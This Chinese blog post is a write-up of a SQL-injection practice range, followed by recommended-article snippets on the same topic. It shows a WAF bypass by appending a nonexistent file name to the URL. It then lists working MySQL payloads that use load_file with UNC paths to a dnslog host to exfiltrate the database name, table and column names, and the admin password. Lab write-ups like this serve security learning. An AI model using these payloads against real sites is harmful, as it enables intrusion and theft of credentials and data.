mysql——dns注入靶场

最新推荐文章于 2022-08-07 21:23:08 发布
最新推荐文章于 2022-08-07 21:23:08 发布
阅读量217 收藏 1
点赞数
分类专栏: SQL注入 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45540609/article/details/115895375
版权

 因为在?id=1 and 1=2时,waf设置了过滤规则,所以要考虑绕过规则

apache的解析是从右往左的,当右边第一个文件不存在的时候会跳过,从而解析第二个文件

于是在url后添加一个不存在的1.txt,然后输入?id=1 and 1=1 和?id=1 and 1=2时页面回显正常了,且表示存在sql注入

在dnslog上获取一个域名

o6bif7.dnslog.cn

利用dns注入

输入1.txt?id=1 and (select load_file(concat('//',database(),'.zxcv.scgh8s.dnslog.cn/asd'))),在dnslog上更新访问记录,得到数据库名是mangzhu

 

select table_name from information_schema.tables where table_schema=database() limit 0,1

输入1.txt?id=1 and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.zxcv.scgh8s.dnslog.cn/asd')))

得到第一个表名是admin,第二个是news

 

select column_name from information_schema.columns where table_name='admin' and table_schema=database() limit 0,1

输入以下命令

1.txt?id=1 and (select load_file(concat('//',(select column_name from information_schema.columns where table_name='admin' and table_schema=database() limit 2,1),'.zxcv.scgh8s.dnslog.cn/asd')))

得到字段名 id,username,password

select password from admin limit 0,1

输入以下命令

1.txt?id=1 and (select load_file(concat('//',(select password from admin limit 0,1),'.zxcv.scgh8s.dnslog.cn/asd')))

拿到flag

 

 

 

 

 

玛卡巴卡巴巴亚卡
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Dns注入
笔墨稠思
11-25 2220
Dns注入(windowns服务器(支持smb服务) mysql数据库) 在我们发送请求时,将域名转换为对应的ip 例如 https://baidu.com 他会将这个域名解析为后面这串数字 220.181.38.251,从而帮助我们找到百度的服务器 Dns注入的原理 在我们对这个域名进行请求,Dns对这个域名进行解析时,可能会在日志中记录请求方的ip和请求的目录,我们可以通过子查询,将我们想要的内容拼接到域名内,让load_file()去访问共享文件,此时,被访问的域名被记录,此时可以去查看Dns服务
mysql注入dns注入
seek_2022的博客
05-03 1975
文章目录一、DNS-LOG使用(域名解析日志)(一)DNS简介(二)LOG日志是怎么产生的?(三)DNS-LOG在渗透测试中的应用二、DNS注入相关知识回顾(一)load_file() 读取文件(二)UNC路径(三)绕靶场WAF三、DNS注入靶场实战(一)判断SQL注入(一)绕靶场WAF(二)查询库名(三)查询表名(四)查询字段名(五)查询并提交flag四、小结 一、DNS-LOG使用(域名解析日志) (一)DNS简介 DNS(域名解析)是把域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站的一
DNS-log注入(zkaq靶场
v2ish1yan的博客
04-21 1287
DNS-log注入
MYSQL--Dns注入
qq_68233961的博客
08-07 1078
MYSQL--Dns注入
mysql注入靶场,​SQL 注入靶场练习 - Dnslog 带外测试
weixin_35144564的博客
03-18 296
dnslog 带外实现依赖 UNC , 因此只能在 Windows 下利用利用 DNS 记录不存在时向上查询的工作模式实现带外***不支持 load_file('http://host:port/1.txt') 模式, 否则用不着 dns 了。OOB 带外中心思想将本地数据 select ...通过触发器 load_file( ... )将结果传递到外部(含文件)xx.dnslog.cn0x00 ...
PHP+MYSQL 注入靶场
最新发布
04-26
**PHP+MYSQL 注入靶场**是一个用于学习和实践**SQL注入**的平台,它包含相关的源代码,有助于用户深入理解漏洞的原理。通过这个靶场,你可以模拟真实环境下的安全测试,提升对SQL注入攻击的防御能力。下面将详细阐述...
mysql注入-sqlilabs靶场注入
10-15
本教程基于SQLiLabs靶场,将深入探讨MySQL注入的各种技术和防御策略。 SQLiLabs是专门为学习和实践SQL注入技能设计的一个在线平台,它包含了多个级别,每个级别代表一个特定的注入场景,逐步提高难度。通过完成这些...
MySQL——JDBC编程
03-13
MySQL——JDBC编程】是关于使用Java程序与MySQL数据库进行交互的技术讲解。JDBC(Java Database Connectivity)是Java中用于执行SQL语句的一组API,它为多种关系型数据库提供统一的访问接口,允许Java开发者操作...
mysql后台注入靶场源码.rar
04-21
该资源为存在漏洞的网站源码,学习web安全的小伙伴可以用来搭建环境做测试用 方法: ...不需要会员功能可以删除member目录 安装完成后更改admin目录为你的后台目录名,更改后的访问地址为 ...安装完成后请及时删除install...
sql注入靶场.zip
06-24
这个"sql注入靶场.zip"文件包含了一个名为"sqli-labs-master"的靶场,旨在帮助学习者了解、实践和防御SQL注入攻击。靶场通常由一系列逐步增加难度的挑战组成,让学习者通过实际操作来提升自己的安全技能。 靶场的...
封神台sql靶场 dns_log 注入
weixin_46578840的博客
06-25 250
前提:目标数据库允许load_file() 1 and 1=1 //正常 1 and 1=2 //页面错误,存在注入 1 and 1=2 union select 1,2 # //回显位为2,由于题目要求用dnslog,那就用联合查询了 构造poyload 1 and (select load_file('//',(concat(select database()),'.xizusd.dnslog.cn/abc'))) 1+and+(select+load_file(concat('//',(select+
Mysql注入——DNS注入
m0_55854679的博客
02-17 2044
DNSlog【解决繁琐的盲注】介绍 DNS => 域名解析 LOG => 日志 dns-log => 域名解析日志【记录别人来查询域名和ip的对应】 DNSlog使用场景 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban,所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。 DNS
MySQL注入Dns 注入
hackzkaq的博客
12-03 197
搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具 DNS注入原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。 DNS注入利用的场景 在无法直接利用的情况下,但是可以通过DNS请求,通过DNSlog,把数据外带,用DNS解析记录查看。 DNSLOG的使用场景 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时
mysql ns_MysqlDNS注入
weixin_33661931的博客
02-07 118
load_file()函数load_file()为读取文件并返回内容为字符串,文件必须位于在服务器主机上,必须指定完整路劲的文件,而且必须有FILE权限。该文件所有字节可读,但文件内容必须小于max_allowed_packet(限制server接受的数据包大小,默认1MB),如果该文件存在或无法获取,因为前面的条件之一不满足,函数返回NULL。这里我在这个目录下存放了一个这样的txt文件,我们尝...
特别的sql注入方式-DNSlog注入--安鸾靶场练习 DNSlog注入学习
AAAAAAAAAAAA66的博客
01-05 2210
DNSlog注入 原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。 利用的场景 存在sql注入 无法获得回显 对目标网站可以发起请求 简单的来说就是可以利用 load_file() 函数,在存在注入的情况下将数据库中的信息带出我们的域名日志中(dnslog).详细的可以看下方链接 DNSLog在MySQL注入
渗透测试基础-MYSQL数据库之DNS注入
weixin_45488495的博客
04-13 340
渗透测试基础-MYSQL数据库之DNS注入WAF【安全应用防火墙】的黑白名单Apache中间件的独有特性DNS及网站应用MYSQL数据库的文件读取UNC路径DNS注入靶场演练漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! WAF【安全应用防火墙】的黑白名单 在我们现在的网站中,像这样的应用防护墙的保护,它名叫WAF。我们这次的靶场也有。 进入我们的靶场页面,在页面的最下面,有一行小字,悄悄告诉我们。这里需要一个id传参,我们
[zkaq靶场]SQL注入--DNS-LOG注入
wwxxee
05-08 243
DNS注入 介绍 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban。 所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。 原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录 此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接
DNS域传送漏洞复现(含靶场搭建)
文公子的博客
03-09 5466
DNS域传送漏洞复现(含靶场搭建)一、漏洞原理及危害二、环境搭建三、漏洞复现四、漏洞修复 一、漏洞原理及危害 DNS域传送漏洞是主备服务器间同步数据未进行严格校验导致的,攻击者可以模拟备份服务器向主服务器请求域内资源。 二、环境搭建 下载https://github.com/vulhub/vulhub/tree/master/dns/dns-zone-transfer内的所有文件到linux电脑,切换目录后使用docker-compose up -d进行搭建 注意:部分服务器默认开启服务占用53端口,直接
DNSlog注入学习(靶场测试全流程)
00勇士王子的博客
04-18 1148
原理: 首先需要有一个可以配置的域名,比如:ceye.io,然后通过代理商设置域名 ceye.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Server,这样以来所有 ceye.io 及其子域名的查询都会到 服务器 A 上,这时就能够实时地监控域名查询请求了。 DNS在解析的时候会留下日志,咱们这个就是读取多级域名的解析日志,来获取信息 简单来说就是把信息放在高级域名中,传递到自己这,然后读取日志,获取信息 利用场景: 在sql注入时为布尔盲注、时间盲注,注入的效率
mysql——字符串拆分数组
05-14
MySQL 中,可以使用 SUBSTRING_INDEX 函数将字符串拆分成数组。该函数的语法如下: ```sql SUBSTRING_INDEX(str,delim,count) ``` 其中,str 为要拆分的字符串,delim 为分隔符,count 为要返回的子字符串的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值